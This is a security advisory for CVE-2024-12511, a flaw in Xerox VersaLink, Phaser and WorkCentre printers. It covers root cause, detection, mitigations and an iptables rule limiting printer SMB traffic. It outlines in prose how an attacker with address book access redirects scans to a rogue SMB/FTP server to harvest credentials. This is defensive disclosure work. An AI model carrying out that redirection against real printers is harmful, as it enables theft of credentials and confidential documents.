CVE-2024-12511 Overview
CVE-2024-12511 is a Missing Authentication for Critical Function vulnerability (CWE-306) affecting Xerox printer devices. With address book access, SMB/FTP settings could be modified, redirecting scans and possibly capturing credentials. This requires enabled scan functions and printer access.
Critical Impact
Attackers with address book access can modify SMB/FTP configurations to redirect scanned documents to attacker-controlled servers, potentially capturing sensitive credentials and intercepting confidential documents.
Affected Products
- Xerox VersaLink Printers
- Xerox Phaser Printers
- Xerox WorkCentre Printers
Discovery Timeline
- 2025-02-03 - CVE CVE-2024-12511 published to NVD
- 2025-09-17 - Last updated in NVD database
Technical Details for CVE-2024-12511
Vulnerability Analysis
This vulnerability stems from missing authentication controls for critical printer functions. When scan-to-network features are enabled on affected Xerox devices, users with address book access can manipulate SMB (Server Message Block) and FTP (File Transfer Protocol) destination settings without proper authorization checks.
The attack scenario involves an adversary gaining access to the printer's address book functionality—either through legitimate low-privilege access or by exploiting weak access controls on the printer's web interface. Once address book access is obtained, the attacker can modify the destination paths for scan operations, redirecting scanned documents to malicious servers under their control.
The most severe consequence is credential harvesting. When a legitimate user initiates a scan-to-SMB operation, the printer attempts to authenticate to the attacker's rogue SMB server, potentially transmitting domain credentials in the process. Additionally, any scanned documents containing sensitive information would be delivered directly to the attacker.
Root Cause
The root cause is CWE-306: Missing Authentication for Critical Function. The affected Xerox devices fail to implement adequate authentication checks before allowing modifications to network destination settings within the address book. This design flaw allows users with basic address book access to modify critical configuration parameters that should require elevated privileges or administrative authentication.
Attack Vector
The attack is network-based and requires low privileges to execute. An attacker needs initial access to the printer's address book functionality, which may be available to any authenticated user on the network. The exploitation process involves:
- Gaining access to the printer's address book through the web interface or physical panel
- Modifying SMB or FTP destination settings to point to an attacker-controlled server
- Waiting for legitimate users to initiate scan operations
- Capturing credentials when the printer authenticates to the rogue server
- Intercepting scanned documents containing potentially sensitive information
The attack requires no user interaction beyond the initial address book access and can be executed remotely over the network. See the Xerox Security Bulletin XRX25-003 for additional technical details.
Detection Methods for CVE-2024-12511
Indicators of Compromise
- Unexpected changes to SMB or FTP destination addresses in printer address books
- Printer scan traffic directed to unfamiliar or external IP addresses
- Authentication failures or anomalous authentication attempts from printer IP addresses
- New or modified address book entries pointing to non-corporate network destinations
Detection Strategies
- Monitor printer configuration changes through SNMP traps or syslog events
- Implement network traffic analysis to detect scan data being sent to unauthorized destinations
- Audit address book modifications and correlate with authorized change requests
- Deploy honeypot SMB shares to detect credential harvesting attempts from printer subnets
Monitoring Recommendations
- Enable comprehensive logging on Xerox device web interfaces and correlate with SIEM solutions
- Monitor network flows from printer VLANs for connections to unknown external hosts
- Implement alerts for address book configuration exports or bulk modifications
- Conduct periodic audits comparing current address book entries against approved configurations
How to Mitigate CVE-2024-12511
Immediate Actions Required
- Review and restrict address book access permissions to only authorized administrators
- Audit all SMB and FTP destination settings in affected printer address books
- Isolate printers on dedicated network segments with restricted outbound connectivity
- Disable scan-to-network functions on devices where they are not required
Patch Information
Xerox has released security updates to address this vulnerability. Refer to the Xerox Security Bulletin XRX25-003 for firmware update instructions and affected model-specific guidance.
Workarounds
- Implement network segmentation to prevent printer-initiated connections to untrusted networks
- Configure firewall rules to restrict outbound SMB (TCP 445) and FTP (TCP 21) traffic from printer subnets to approved file servers only
- Disable remote address book modification capabilities through printer security settings
- Enable SMB signing and require NTLMv2 or Kerberos authentication to limit credential exposure
# Example firewall rule to restrict printer SMB traffic (iptables)
# Allow SMB only to approved file server
iptables -A FORWARD -s 10.0.50.0/24 -d 10.0.10.5 -p tcp --dport 445 -j ACCEPT
# Block all other SMB from printer VLAN
iptables -A FORWARD -s 10.0.50.0/24 -p tcp --dport 445 -j DROP
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
